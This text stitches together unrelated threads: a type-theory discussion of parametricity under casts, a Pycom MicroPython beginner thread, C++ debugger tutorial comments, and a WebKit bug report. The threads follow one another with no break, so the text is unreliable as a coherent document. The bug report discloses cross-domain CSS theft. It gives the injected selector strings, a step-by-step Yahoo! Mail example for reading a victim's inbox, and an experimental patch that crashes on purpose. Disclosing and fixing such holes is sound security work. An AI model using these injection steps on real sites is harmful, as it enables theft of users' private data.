Well, it's not clear to me what parametricity means in a general setting. How are types in some arbitrary type system considered relations?
The construction I have in mind is to construct a type system "outside" of the original (possibly typed) language, for which function types and quantifiers mean what we want them to mean. Then we can get a parametricity theorem in this more general setting, and as long as types in the original langauge have corresponding types in the enriched type system, we can pull back our free theorems.
In order to assign a more traditional type to a value in the language, you have to have modeled all computation that can be performed in the language. For example, you have to model casts as operations on tagged data. You could probably also model side-effects functionally and get parametricity results for impure languages this way.
I await your objections :)
Well, it's not clear to me what parametricity means in a general setting.
Good question! FWIW, we tried to give some answers in our ICFP'09 paper.
How are types in some arbitrary type system considered relations?
Usually, you want the relational interpretation to be at least a sound approximation of observational equivalence. That is, it should never relate two objects that can be told apart by some program context. On the other hand, you need every well-formed object to be related to itself.
A (logical) relation is parametric if the case for polymorphic types is defined such that you can nevertheless always pick an arbitrary relation as representative for the quantified type. If you can still prove soundness of the relation then this implies that polymorphic types are really abstract.
A polymorphic function whose result depends on the outcome of some cast is not even related to itself under such a definition. Consequently, a parametric relation can't be sound in the presence of such casts.
I'm not sure I fully understand your suggestion or how it would change the situation. It seems like you are proposing to encode the non-parametric language in a parametric one. That can be done, but then parametricity of the host language does not necessarily imply anything interesting about the object language. Also, to transfer any results you might need to know that your encoding is fully abstract, a property that generally is extremely hard to prove.
A (logical) relation is parametric if the case for polymorphic types is defined such that you can nevertheless always pick an arbitrary relation as representative for the quantified type.
Well, taking this to define the relation corresponding to e.g. List<T> in an OOP language with casting does look like it will break parametricity. I'm suggesting: don't do that. It seems that with a modified definition that restricts what relations we're quantifying over (and with similar modifications elsewhere), that we could preserve the statement of the parametricity theorem. I'm fuzzy on the details, though, and I can see why you would object to calling such a thing "parametricity".
I don't understand what you are trying to achieve. That is the distinguished meaning of "parametricity". What you propose is like redefining "non-smoking" to mean "no smoking, but igniting cigarettes is allowed", i.e. it simply renders the word meaningless.
As for the "parametricity theorem", there isn't really any such theorem. What Wadler calls the parametricity proposition is simply the so-called Fundamental Property or Fundamental Theorem of the logical relation - i.e., that every well-formed term is related to itself. In his case the relation was parametric, but you will have such a theorem for any suitable logical relation, parametric or not (see our aforementioned paper for an example of a non-parametric one). But of course, if the relation is non-parametric, you don't get any "free theorems" out of it.
I'm just defending my speculation that you can get free theorems in the same spirit as "Theorems for Free!" even if parameterization in your language isn't completely "free". The speculation is that, heuristically, instead of interpreting a type like List<T> as something akin to (forall a. List a), you interpret it as something like (forall a. Castable a => List a). I mentioned at the outset that resulting free theorems would probably be weak to the point of useless. Maybe such things shouldn't be called "parametricity", but it's in the same vein.
Thanks for the link, btw. I've only read part of it, but so far it's interesting.
While I understand your argument, I favor Andreas's underlying position that we shouldn't undermine the meaning of our words by allowing them to apply vacuously or when they fail to make a useful distinction. When someone says 'parametric', I expect them to mean it in some useful manner, lest we discuss the pinkness of invisible unicorns.
In that same vein, 'type safety' and 'type inference' shouldn't be used for systems that have only one type, and 'capability model' shouldn't be applied to pure functional expressions that forbid communication effects.
The resulting theorems would no doubt be complex, weak, and practically useless, but they would not be strictly trivial. I don't disagree that 'parametricity theorem' is a bad name for this.
I suspect I'll need to see a non-trivial theorem before I'll agree they exist.
You used 'forall a.Castable a => List a'. It is unclear what, precisely, 'Castable' means to you. (How does it relate to Haskell's "Dynamic" or "Typeable" classes?)
But I assume your qualifying use of the intentionally vague phrases "something akin to" and "something like" means I am to substitute 'Castable' with whatever kin come to mind.
Reflective programming comes to mind. So let's use that: forall a. Reflective a => List a, where 'Reflective a' at its limit would mean access to arbitrary properties of the type, the specific values, and potentially even the version-history of the type and the origin of those values (fexpr-like access to context (lexical and dynamic environment), expression (operands and operands' operands), reflective stacks).
If you do not feel I am too broadly interpreting the momentary hand-waving you included in your earlier post, then of which non-trivial parametricity theorems do you speak that will apply to Castable and its various kin?
If every operation is possible on every parameter, you don't get any nontrivial theorems. So with a strong enough reflection, you'd necessarily have no free theorems. If you're only allowed casts, it looks like you could say something about how a function behaves with respect to fresh types. Does that count? :)
Without casting there's only one value with type forall a. List a, namely []. With cast :: forall a b. a -> Maybe b I can create all kinds of values:
helloWorldOrNil :: forall a. List a
helloWorldOrNil = fromMaybe [] $ cast "hello world!"
What theorems does that leave me with?
But parametricity is easy if the only type is Univ. You just don't get any theorems...
Yeah, making cast total gives you "forall a b.a -> Maybe b" which is some seriously weak tea.
If you have parametric type constraints and a subtype relation <: you can do a little better:
forall A B | B <: A. A -> Maybe B
Of course then the subtype relation must cover type parameters as well, or you get into further binds down the road.
Once your language has a top type (like, for most purposes, Object in Java), that type is as general.
From that you can build
forall a b exists t | a <: t ^ b <: t . a -> Maybe b
And, as Andreas says, a top type trivially satisfies the existence of t.
BTW, is the List class in this example the List imported from Java, or part of the Scala libraries?
Java inching toward Scala?
Nice to see this becoming mainstream. Aldor (then called A#) does something very similar.
This is particularly useful in a mathematical setting for writing generic packages that apply isomorphisms, e.g. transpose(C1, C2)(R) converting C1(C2(R)) values to C2(C1(R)) values. So transpose(Complex, Polynomial(x))(Integer) would convert Complex Polynomial(x) Integer to Polynomial(x) Complex Integer, that is complex values with polynomial real and imaginary parts to polynomials with complex coefficients. Parameterized differently, the same constructor would convert matrices of quaternions to quaternions of matrices, etc.
A simplified example for data structures is given in the Aldor User Guide (page 222).
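For intuition, a minimal Scala sketch of the same swap, fixed to the two constructors List and Option rather than abstracted over arbitrary constructors (a general version would need a Traverse-style interface):

def transpose[A](xs: List[Option[A]]): Option[List[A]] =
  xs.foldRight(Option(List.empty[A])) { (x, acc) =>
    for (v <- x; rest <- acc) yield v :: rest
  }

// transpose(List(Some(1), Some(2))) == Some(List(1, 2))
// transpose(List(Some(1), None))    == None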
coding? Module? Tutorials? (Newbie)
- I haven't received my LoPy yet, but I want to try the code from the docs section.
Is that possible?
- I tried to import the network module but can't access it online. Where can I get that? (Even to simply read it, not make it work.)
- Are there any tutorials you'd recommend to help get started with Pycom?
Hi,
You can find a series of code tutorials for Pycom modules on our documentation website, and we also provide code examples on our GitHub. While MicroPython is very similar to regular Python, there are libraries that are specific to our devices. I have noticed you have asked in several places on the forum where the "network" module comes from. This is not a regular Python module that you can install on your desktop, but rather a module implemented in C by our firmware. Because some modules are only present in our firmware, there will be a lot of examples you cannot run on your desktop. On the other hand, most Python you write on your desktop will run on Pycom modules; MicroPython has only a few limitations compared to full Python.
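For example, a minimal on-device sketch (the SSID and password are placeholders); this only runs on the module's firmware, not in a desktop interpreter:

import network
import machine

# `network` here is the module implemented in C by the Pycom firmware,
# so this import fails on a desktop Python install.
wlan = network.WLAN(mode=network.WLAN.STA)
wlan.connect('my-ssid', auth=(network.WLAN.WPA2, 'my-password'))
while not wlan.isconnected():
    machine.idle()  # wait (and save power) until the connection is up
print(wlan.ifconfig())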
@hajermet said in coding? Module? Tutorials? (Newbie):
@livius
Thanks for your reply but then I only did python before (so this may seem dumb) but can't I like download a .py file to read? (I want to understand what it basically is)
I don't think that reading examples will help with the basic understanding.
You will find the examples on GitHub.
The *Pys are basically ESP32 microcontrollers which have WiFi and Bluetooth on board. Depending on the * they have additional radio systems. They run a port of MicroPython. The additional radio systems are the trick of the *Py: with them you can communicate with sensors and actuators outside of your WiFi range. The * radio system will transport only small messages, but with a much larger range than unpimped WiFi. Some of them use gateways to the internet to increase the range.
It seems that Pycom builds an ecosystem on top of this basic functionality, so you can buy expansion boards and sensors from them, which have easy-to-use libraries for MicroPython.
but can't I like download a .py file to read?
What did you try to download that you cannot? Please describe this more clearly.
@livius
Thanks for your reply but then I only did python before (so this may seem dumb) but can't I like download a .py file to read? (I want to understand what it basically is)
I tried to import the network module but can't access it online
Import it where, if you don't have the module yet?
But you can find examples in the official docs,
and some, with modification, should work from normal Python, but some will not.
This is micropython, not full python.
and you have many examples of user code on the forum.
Recommended to add (for Xcode users on macOS) something like:
"On Xcode, you must add breakpoints before you debug. You click on the number next to the line to do that. Then you Run (cmd + R) the program and don't do any other build types, as they ignore breakpoints. This also executes the code as a program, so it will output anything you have in it. (E.g., if you don't put a breakpoint before
it will write "Hi!" in the terminal.)"
Absolutely brilliant. I can see I'm going to be making a lot of use of this!
#include <iostream>
using namespace std;

#define max 10
int main()
{
    char a[max];
    int total=1;
    char ch;
    for(int i=0;i<max;i++)
    {
        cin>>a[i];
        total=total*a[i];
        cout<<"Do you want to add?\n";
        cin>>ch;
        if(ch=='n')
            break;
    }
    for(int i=0;i<max;i++)
        cout<<a[i];
    cout<<total;
    return 0;
}
solve error
Hi Karna!
Please use code tags, your code is incomplete.
What's the error message you're getting?
Don't use 'using namespace'.
Prefer constexpr over macros.
Q. For this code snippet, identify the conditions under which errors occur / the code fails to act as expected.
#include <iostream>
using namespace std;

#define max 10
int main()
{
    char a[max];
    int total=1;
    char ch;
    for(int i=0;i<max;i++)
    {
        cin>>a[i];
        total=total*a[i];
        cout<<"Do you want to add?\n";
        cin>>ch;
        if(ch=='n')
            break;
    }
    for(int i=0;i<max;i++)
        cout<<a[i];
    cout<<total;
    return 0;
}
please solve this
Hi! For some reason when I choose 'Step into' while I am on
it never goes into the function, it just prints the value into the console and then goes to
. I understand everything you wrote I just wonder if there is a reason for this?
Thank you!
Edit: I tried it a few more times and then it just worked, weird... Thanks either way! :)
please solve this fast sir
Dear Teacher, please let me ask the question: In "Conclusion" you say: "Congratulations, you now know all of the major ways to make the debugger move through your code". How do you know that I know all that? Regards.
Well, you have at least been exposed to it. Whether you retained it or not is a personal issue. :)
Hello Alex, nascardriver
I am having an issue with debugging.
For fun I made my main program run on a do/while loop to run a menu to be able to run all programs I have written so far.
Now as I attempt to debug one of the programs, which lives in its own file, I am constantly taken to main, and when I attempt to run
the buggy program it will not let me into the file to run it statement by statement to find where I am having my issue.
I have tried the step in, step out and step over but it will not let me get past the loop in main. should I temporarily terminate the loop to debug?
Also if you do not mind, I would like to go ahead and ask you what I did wrong with this code that causes windows to terminate my program. It is an attempt to dynamically allocate a string array to enter in a string. It looks right and compiles fine without issue, but when it is called it will initiate with the cin call but it terminates with a windows error before I can proceed.
That should be everything you need to run it.
Thank you for your help.
Hi Joe!
I can't help you with your debugger problem. Which IDE are you using?
@sizeof doesn't return the length of a string. It returns the size of the specified data type/variable. You need
Line 15: @string is of length @value6 so there is no index at @value6. You need
or
Your variables have bad names.
Thank you nascardriver,
I attempted again to run the code but it is still causing an error and being shutdown by windows.
I am using Visual Studio 2017.
I commented out line 15 and the for each loop and instead ran a regular for loop to cout the elements.
An update while I was writing. It seems there was still input in the buffer. So that caused the crashing. I added to my
getLine() function a cin.ignore to clear the buffer and it is running now.
I am still having an issue with why my input is not being assigned to my array. But at the least it has stopped
crashing.
Mind sharing your new code? Unless you want to figure it out on your own.
where is the continue command in visual studio 2017 while debugging ?
Hi varad!
Green play button at the top with "Continue" next to it.
I would just like to take this moment to thank you Alex and all the other helpful on this website for helping not just me but everyone learn how to code.
You're welcome. Thanks for visiting!
Dear Teacher, please let me ask your help. I tried debugging with Code::Blocks 17.12 but failed. Problem is Settings > Debugger > Common > GDB/CDB debugger. I created path for gdb.exe and deleted Default according to an answer at Stack Overflow. Eventually after clicking Debug > Step into, a wxWidgets appears saying: Unknown option 'nx'. Thanks in advance. Regards.
Hey Georges,
I'm unable to assist you with this, as this appears to be a Code::Blocks specific configuration issue. Your best bet is to use Google search to see if you can find someone who has had the same problem.
Dear Teacher, please accept my many thanks for your reply and your helpful answer. I searched with the words "code blocks option 'nx'", and from the results I chose "Images for code blocks option 'nx'". Then: first image > click on image > 2.1 Installation > I followed the instructions. Indeed, in the Debugger settings I configured "Default" (without quotes) and deleted the gdb.exe I had added according to the Stack Overflow suggestion. If you do not configure gdb.exe, the default setting is Default. Eventually everything is okay. Regards.
Glad to hear you were able to resolve it.
The step into and step over commands are different, but not as described in this text. Step over can still execute the statements in the function.
> Like "Step into", The Step over command executes the next line of code. If this line is a function call, "Step over" executes all the code in the function...
Seems pretty clear to me that step over executes the statements in the function. What am I missing?
Hi Alex,
When I tried to execute the step in command, I received the following error:
ERROR: You need to specify a debugger program in the debuggers's settings.
(For MinGW compilers, it's 'gdb.exe' (without the quotes))
(For MSVC compilers, it's 'cdb.exe' (without the quotes))
How do I specify a debugger program?
Thanks
Not sure, as this is a code::blocks specific issue. Try some of the suggestions here:
I got the answer for it. Just click on Settings --> Debugger --> Common --> GDB/CDB Debugger --> Default.
Then click on the executable path to find the address of gdb32.exe.
Then locate where your Code::Blocks is installed and follow the given path:
CodeBlocks --> MinGW --> bin --> gdb32.exe (locate it and double click on it).
Then press OK and you are good to go.
Great. It works.
thanks
Your wlc Noam
Hey Alex,
When I'm using step into, it will step through my program, but when it comes back out to main() and is running the "std::cout << "The sum of 3 and 4 is " << add(3, 4) << std::endl;" line, it will jump through all of these library files without outputting that code in the console window that opens up. For example, it will step through functions in "ostream", "iosfwd", "xiosbase", and a bunch of other files before it tries to read a file that is non-existent and errors out. None of this happens when I run my code normally.
Any thoughts on why this is happening?
Thanks,
Michael
That code is the code that implements std::cout and the << operator. As soon as you enter a standard library function, you should step out to return back to the caller.
Sir, what is the difference in function between "Run to Cursor" and "Breakpoint". They both seem to serve the same purpose of running up to a particular line of code after which we want to look carefully.
The two functions are similar. Breakpointing code will always cause the debugger to stop on that line (stopping there multiple times if relevant). Run to cursor causes the debugger to run until the current line is encountered. It's like using a temporary breakpoint on the current line. Run to cursor is really a convenience command.
My dear Teacher,
Please let me ask you add a paragraph about breakpoints with code blocks, because with them breakpoints behave different than with visual studio.
With regards and friendship
My dear Teacher,
Please let me say breakpoint behave in code blocks as in v.s. but I have confused it with bookmarks I do not see in your tutorial.
With regards and friendship
My dear c++ Teacher,
Please let me say I can not understand "Choose “Step over” this time (this will execute this statement without stepping into the code for operator <<)."
How can that statement "std::cout << nValue;" be executed without operator "<<" being executed?
With regards and friendship
Georges Theodosiou
Operator<< is executed, the debugger just won't step you through the code for operator<< line by line.
plz help me to debug a program in code blocks
man plz help me !
When I use step into or use any of the debugging feature in code blocks 16.01 IDE, no console output window appears just a message comes in the log window that debugging finished with status 1.
ALEX, Plz Help Me Man.
Did you switch to a debug build target and do a full recompile?
I spotted the error myself and fixed it....thanks Anyway Man !
My dear c++ Teacher,
Please let me a suggestion:
In "Step into" section after "Visual Studio does not, so if you’re using Visual Studio, choose “Stop Debugging” from the debug menu. This will terminate your debugging session."
add: "if you continue click "step into", another .cpp file will open and yellow arrow will indicate some line in it. You must close this file and click “Stop Debugging”".
Also in the "Run" section you say:
"If you have been following along with the examples, you should now be inside the printValue() function. Choose the run command, and your program will finish executing and then terminate."
But visual studio has not "run" command. "Continue" command (in Debug menu) and "Run To Cursor" in menu after right click with mouse pointer on a line do this job. Problem is that console window (the black one) disappears quickly and you can not see number 5.
With regards and friendship.
Note to Visual Studio 2017 users: The "run to cursor" function doesn't exist in the debug menu, but a green button pops up to the left of a line when you highlight it during debugging.
My dear c++ teacher,
Please let me send you my last comment for today.
1. In templates you have "PrintValue(int nValue)", capital first letter.
2. Between 2nd and 3rd templates and below 3rd you state "is the call to printValue()" and "the printValue() code", and "opening brace of printValue()". My understading is that you mean: function definition "void printValue(int nValue)", and that "printValue()" is function call.
Bonne journée.
With regards and friendship.
My dear c++ Teacher,
Please let me say you that in text between 2nd and 3rd template you state: "Because printValue() WAS a function call, we “Step into” the function ...". According to my bad english it means: "printValue() is NOT any more function call".
With regards and friendship.
"was" updated to "is", as it still is a function call. Thanks!
My dear c++ Teacher,
Please let me again ask your help for always you help your last disciple Georges Theodosiou.
How can I do "step into" with Dev c++ 5.11?
With regards and friendship.
I am not familiar with dev c++ 5.11 so I am unable to advise you on this. I am unsure if it applies to version 5.11, but the following document may be helpful:.
My dear c++ Teacher,
Please let me express my gratitude for you replied my comment (my dear dsp Teacher Mr. Richard Lyons snobs me, he teaches me only by his book) and for suggested me a good document. It applies to version 5.11 but with some differences in names. For example instead of "next step" this version has "next line". Anyway it is helpful.
With regards and friendship.
My dear c++ Teacher,
Please let me say that as it is clear from the document you suggested me, debugging with Dev-C++ 5.11 is different than with Visual Studio.
Before clicking "Next line" (step into) I have to check (by clicking) breakpoint. When I click (set breakpoint) on line 1 (#include <iostream>) and then click "Debug", arrow (blue) appears on line 5 (std::cout << nValue;). When next I click "Next line", console window outputs "5", and arrow goes to line 6. When I click again "Next line" arrows goes to line 11 "return 0;" and after one more click on "Next line" it goes to line 12, end of program.
Now if I close file main.cpp and open it again, and set breakpoint on line 8 (int main()), and click "Debug", arrows goes to line 10 (printValue(5);). If then click on "Next line" console window outputs "5", and arrows goes to line 11, and after one more click on "Next line" it goes to line 12.
So, arrow never goes from function call: printValue(5) to function definition: void printValue(int nValue).
With regards and friendship.
My dear c++ Teacher,
Please let me ask you in sentence "step into enters ..." type "step into" with bold letters so your non American disciples easy understand it is subject of the verb "enters".
With regards and friendship.
I've quoted "step into" in this case, to make it easier to read. Thanks for pointing that out.
My dear c++ Teacher,
Please let me tell you what two compilers output for the first program, a number divided by zero. Compiler
Dev-C++ 5.11 shows a dialog: "Project1.exe a cessé de fonctionner", that is: "Project1.exe has stopped working". The other compiler outputs: "Floating point exception (core dumped)".
With regards and friendship.
I'm using Code Blocks 16.01 on Ubuntu 16.04 and I cannot get the 5 to print in the debugging window. By default Code Blocks launches xterm but stepping into and moving to next line does not display any value in the xterm console as shown:
Some forum posts on the Code Blocks forum and other places suggest changing some settings. For example, changing from xterm to gnome-terminal. However I have the exact same results:
I initially thought it was related to the message I see "warning: GDB: Failed to set controlling terminal: Operation not permitted", but multiple threads on the Code Blocks forums imply that this is a cosmetic issue and should have no effect on debugging functionality.
I have installed Code Blocks on a machine running Windows 10 and I am able to see the "5" value in the debugging window. This seems to be unique to either the configuration of Ubuntu or of Code Blocks on this machine, however there is nothing I know of that has been modified.
Could someone please assist me with fixing this issue?
Thanks in advance,
Ian
I was able to resolve this issue by using std::endl
If you are having trouble getting the debugger window to show anything on linux, I would check if the following works:
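For example, a minimal check along these lines (a reconstruction of the kind of snippet meant here):

#include <iostream>

int main()
{
    int value{ 5 };
    // std::endl flushes the stream, so the value shows up in the
    // debugger's terminal immediately instead of sitting in a buffer.
    std::cout << value << std::endl;
    return 0;
}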
My dear c++ Teacher,
Please let me say some problems I got using Code::Blocks 16.01.
1st: When first I choose "step into", yellow arrow appears not to the left of the opening brace of main(), but of the printValue(5);.
2nd: When for second time I choose "step into", yellow arrow appears not to the left of the opening brace of printValue(int nValue), but of the std::cout << nValue;.
Also let me following question:
You state: "Choose “Step over” this time (this will execute this statement without stepping into the code for operator <<). Because the cout statement has now been executed, you should see that the value 5 appears in the output window."
Yes, value 5 appears in the output window, but how "step over" executes this statement without stepping into the code for operator <<? My understanding is that this operator is including in this statement, then if operator is ignored, statement should not be executed.
With regards and friendship.
I wrote the article using Visual Studio 2015 -- some other debuggers might do things slightly differently. So your first and second point are fine.
Regarding your third point, step over does not ignore the statement -- it executes the statement without stepping into any functions, allowing you to skip past function calls you're not interested in debugging.
My dear c++ Teacher,
Please let me suspect that I have to follow your way: discover compiler's features by trial and error. Do you suggest me that?
I wish you happy new year and every year to come, and live many years for teach me c++!
With regards and friendship.
Yes, you should not be afraid to learn by experimentation.
Alex:
Using Visual Studio 2015. Debugged printValue sketch and everything in tutorial went according
to plan up to the point of entering "Step out".After that a new screen with over 200 lines
of code popped up. My original screen was titled ConsoleApplication7.cpp . The new one was simply called
Miscellaneous. The cursor was at line 64 in this program. After fumbling around a bit I found that if I
repeatedly clicked "Step into" the cursor walked down the page and eventually ConsoleApplication7 came
back. The figure 5 did appear in the console output window after "Step out" was applied. After restoring
the ConsoleApplication7 screen with "Step into" clicks the output screen was blank. Is there an easy
answer?
Garry E
Could have been something from the C++ standard library. Sometimes the debugger will pop into there and walk through all kinds of crazy obtuse code before returning back to your code. When that happens, an additional step out normally returns you to your code.
For xCode 7 Users:
My debug menu in xCode 7 was greyed out, this YouTube tutorial was a good explanation:
Hi, I still do not understand how 5 - 3 = 2; how come it should be 8 as you said above?
The function is named add(), so clearly the intent is to add the numbers, not subtract them. The add() function has a typo where the minus operator is being used instead of the plus operator, so the result of add(5,3) is 2 instead of the expected 8.
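For reference, a minimal reconstruction of the kind of program being discussed (not necessarily the lesson's exact code):

#include <iostream>

// The typo under discussion: operator- where operator+ was intended,
// so add(5, 3) returns 2 instead of the expected 8.
int add(int x, int y)
{
    return x - y; // bug: should be x + y
}

int main()
{
    std::cout << "The sum of 5 and 3 is " << add(5, 3) << '\n';
    return 0;
}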
[Apologies for not filing this sooner. I thought I had filed it, but it seems not. I've been sat on this for too long. Since this affects all browsers equally, I was going to just discuss it on my blog and let the web community figure out the best way to address this. However, I thought it would be polite to offer WebKit / Safari a chance to fix it first].
The attack involves cross-domain CSS stylesheet loading. Because the CSS
parser is very lax, it will skip over any amount of preceding and following
junk, in its quest to find a valid selector. Here is an example of a valid
selector:
body { background-image: url(''); }
If a construct like this can be forced to appear anywhere in a cross-domain document, then cross-domain theft may be possible. The attacker can introduce this construct into a page by injecting two strings:
1) {}body{background-image:url('
(Note that the seemingly redundant {} is to resync
the CSS parser to make sure the evil descriptor parses properly. Further note that having the url start like a valid url is required to steal the text in some browsers).
2) ');}
And anything between those two strings will then be cross-domain stealable! The data is stolen cross-domain with e.g.
window.getComputedStyle(body_element, null).getPropertyValue('background-image');
(This works in most browsers; for IE, you use ele.currentStyle.backgroundImage)
There are a surprising number of places in internet sites where an attacker
can do this. It can apply to HTML, XML, JSON, XHTML, etc.
At this point, an example is probably useful. To set up for this example, you need:
a) Get a Yahoo! Mail account.
b) Make sure you are logged into it.
c) E-mail the target victim Yahoo! account with the subject
');}
d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate one).
e) E-mail the target victim Yahoo! account with the subject
{}body{background-image:url('
f) Send victim to theft page
g) The stolen text shown is achieved via cross-domain CSS theft.
Other good examples I've had success with are social networking sites, where the attacker gets to leave arbitrary-text comments which are rendered on the victim's trusted page.
The main common construct that prevents exploitation is newlines.
Obviously, newlines cannot be considered a defense! Escaping or encoding of quote characters can also interfere with exploitation. One useful trick: if ' is escaped, use " to enclose the CSS string.
Part 2 (on possible solutions) to follow.
<rdar://problem/7258451>
Possible solutions.
First, there are some solutions it is easy to reject:
1) Restrict read of CSS text if it came from a different domain.
This is a useful defense that I filed a while ago in a different bug. But it
will not help in this case. The attacker can simply use a URL on a server they control as a prefix for the background-image value, and wait
for the HTTP GET to arrive which includes the stolen text in the payload.
2) Do not send cookies for cross-domain CSS loads.
This probably breaks a load of sites? It is certainly a riskier approach. I
have not dared try it!
The solution that I'm playing with is as follows:
- Activate "strict MIME type required" in the event that the CSS was loaded
(via link tag or @import) as a cross-domain resource.
- Also, crash hard if a CSS load fails due to strict MIME type test failure.
I've been running my build locally with these changes for a few days and there
seems to be some merit in this approach, i.e. my browser hasn't crashed apart
from when I hit my attack URLs..
Here's the patch I'm running with. Including 3rd chunk which crashes on mismatched MIME type when strict mode is on... (note -- not adding as an attachment because it most certainly is not a proposed patch :P )
Index: html/HTMLLinkElement.cpp
===================================================================
--- html/HTMLLinkElement.cpp (revision 48734)
+++ html/HTMLLinkElement.cpp (working copy)
@@ -252,6 +252,12 @@
if (enforceMIMEType && document()->page() && !document()->page()->settings()->enforceCSSMIMETypeInStrictMode())
enforceMIMEType = false;
+ // If we're loading a stylesheet cross-domain, always enforce a stricter
+ // MIME type check. This prevents an attacker playing games by injecting
+ // CSS strings into HTML, XML, JSON, etc. etc.
+ if (!document()->securityOrigin()->canRequest(KURL(ParsedURLString, url)))
+ enforceMIMEType = true;
+
m_sheet->parseString(sheet->sheetText(enforceMIMEType), strictParsing);
m_sheet->setTitle(title());
Index: css/CSSImportRule.cpp
===================================================================
--- css/CSSImportRule.cpp (revision 48734)
+++ css/CSSImportRule.cpp (working copy)
@@ -26,6 +26,7 @@
#include "DocLoader.h"
#include "Document.h"
#include "MediaList.h"
+#include "SecurityOrigin.h"
#include "Settings.h"
#include <wtf/StdLibExtras.h>
@@ -62,7 +63,10 @@
CSSStyleSheet* parent = parentStyleSheet();
bool strict = !parent || parent->useStrictParsing();
- String sheetText = sheet->sheetText(strict);
+ bool enforceMIMEType = strict;
+ if (!parent || !parent->doc() || !parent->doc()->securityOrigin()->canRequest(KURL(ParsedURLString, url)))
+ enforceMIMEType = true;
+ String sheetText = sheet->sheetText(enforceMIMEType);
m_styleSheet->parseString(sheetText, strict);
if (strict && parent && parent->doc() && parent->doc()->settings() && parent->doc()->settings()->needsSiteSpecificQuirks()) {
Index: loader/CachedCSSStyleSheet.cpp
===================================================================
--- loader/CachedCSSStyleSheet.cpp (revision 48734)
+++ loader/CachedCSSStyleSheet.cpp (working copy)
@@ -138,7 +138,9 @@
// This code defaults to allowing the stylesheet for non-HTTP protocols so
// folks can use standards mode for local HTML documents.
String mimeType = extractMIMETypeFromMediaType(response().httpHeaderField("Content-Type"));
- return mimeType.isEmpty() || equalIgnoringCase(mimeType, "text/css") || equalIgnoringCase(mimeType, "application/x-unknown-content-type");
+ if (!(mimeType.isEmpty() || equalIgnoringCase(mimeType, "text/css") || equalIgnoringCase(mimeType, "application/x-unknown-content-type")))
+ *((char*)NULL) = '\0';
+ return true;
}
}
(In reply to comment #2)
We could experiment with doing that, but the risk may be somewhat high. The security benefit could be worth it however.
Note that any experimental WebKit change would get an automatic workout in the Chrome dev channel builds fairly quickly ;-)
(In reply to comment #5)
> Note that any experimental WebKit change would get an automatic workout in the
> Chrome dev channel builds fairly quickly ;-)
This is a good opportunity to use UMA to see which of these mitigations are feasible w.r.t. compatibility.
This is something I continue to fail to have time to look at -- hence the filing of the bug upstream :-/
Yeah, I got a good patch which is both conservatively secure and conservatively compatible. Compatibility has been checked with a run across 500,000 URLs, and in fact the solution was derived from these URLs. I'll upload the patch once I have a good test too :)
Patch to follow, I think it's good. I've done a lot of testing including:
- Full LayoutTests (clean)
- Mining of 500,000 URLs for interesting cross-domain CSS usage. Best I know, the only site affected by this is one which looks slightly different but is still acceptable and usable. Regrettably, this page uses text/html for a cross-domain CSS load and prefixes valid CSS with "<style>".
- It turns out that cross-domain text/html with a valid CSS payload, and text/plain with a valid CSS payload, does occur (28 occurrences in 500,000 URLs, including, curiously, configure.dell.com)! Therefore this case is accounted for.
- Other common MIME types mistakenly used for cross-domain CSS loads include application/octet-stream (53 / 500,000), application/css (1), application/x-pointplus (1)
Created attachment 42540 [details]
Patch and test
Nice idea Chris. I'm going to let an expert in this area review the actual code, but I like the approach.
Have you shared the approach with the other browser vendors? It would be best if we all did the same thing.
This looks like a promising approach (have not reviewed the CSS parser details yet).
I'm sorry to bring these to the table late, but here are some other ideas I thought of:
1) For cross-site stylesheet loads, disable Cookies, HTTP Auth, and sending of client-side certs (or perhaps any SSL). Then the only risk is to content that is only protected by a firewall. I'm not sure if this would break anything, but it would depend less on the details of the CSS parser so it may be more robust.
Any thoughts on these?
If I am not mistaken, I believe we now always disallow scripting access to cross-site stylesheets.
I am cc'ing hyatt, who would probably be the best person the review the change to the CSS parser.
Comment on attachment 42540 [details]
Patch and test
Not a full review, just some passing comments
- I think we should be using the term crossOrigin instead of crossDomain since we are really talking about the origin tuple, not just the domain.
- I am not a fan of the term "good" in the context you are using it. What is a "good" header? What is a "good" CSS rule? Please be more explicit with those names.
- Is this something we should add a Setting for while it is still experimental?
> +void
> +CSSParser::invalidBlockHit() {
Two nits. The "void" should be on the same line as the rest of the function prototype. The { should be on the next line.
@Sam, comment #13: unfortunately, the referenced change does not prevent script access. It simply stops raw CSS rule text access via the "cssRules" array (bringing WebKit in line with all other browsers). It leaves the getComputedStyle().getPropertyValue() avenue open. And even if we closed that, it's still not good enough, see next comment...
@Sam, comment #14: thanks. I'll use "syntacticallyValid" instead of "good".
Hyatt, any thoughts?
(In reply to comment #16)
Good point. I withdraw the idea.
I heard recently that IE no longer sends Cookie headers for cross-site <script> loads, which is what made me think of the idea for styles. I think we should consider #1 if it turns out to be sufficiently compatible, perhaps in combination with your change.
I will try to get someone with CSS parser knowledge to look at your patch.
Where did you hear that IE doesn't sent cookies for cross-site <script> loads? Maybe you're thinking of Gazelle?
I spoke with Charlie Reis recently and we talked about just this. A lot of sites unfortunately depend on it (an example site was given). I've not checked myself, but Charlie is pretty reliable.
The reason I prefer the "stricter CSS" approach is that sites are welcome to depend on cookies being sent for cross-origin CSS, and it's not an unreasonable thing to do. On the other hand, it's not reasonable for sites to load cross-origin CSS with busted MIME types and a CSS syntax error preceding valid CSS.
However, I would of course be delighted if we could just not send cookies for cross-site script, CSS etc. I just think it'll break stuff. May be worth an experiment in the future...
Comment on attachment 42540 [details]
Patch and test
You need to patch XML processing instructions also, and there needs to be a test for those.
I agree the need to test XML processing instructions. I'll get on that.
However, I don't think a code change is needed because "strict" mode is enforced, which requires a valid CSS MIME type. This is certainly subtle -- strict mode is used because of a defaulted C++ parameter, so I'll add a comment.
Created attachment 43007 [details]
Address all comments from review
New patch updated, featuring:
- Fixes Sam's naming and style comments.
- Adds a test for the CSS in XML case noted by Dave.
- Adds a comment and makes the "strict" mode of CSS in XML more explicit.
- Tweaks one of the tests to check that a semantically invalid descriptor (i.e. contains unknown property) loads OK.
- Better ChangeLog entry.
Ping? I'm now away until Tuesday, and then limited availability for Tues & Weds prior to three weeks away. I'd rather not lose this small window for landing this.
Comment on attachment 43007 [details]
Address all comments from review
The CSSParser changes seems iffy to me. Why limit to just a "header" check? What if you hit an invalid block first and then hit some valid rules following the invalid block?
What is the point of the extra enforceMIMEType argument to parseString? It looks like it matches whether or not you're using strictParsing always, so I don't get the point of it.
That previous comment about enforceMIMEType may not have been totally clear. I'm specifically wondering about CSSImportRule. It looks like enforceMIMEType is never being checked against the setting:
HTMLLinkElement has the following code:
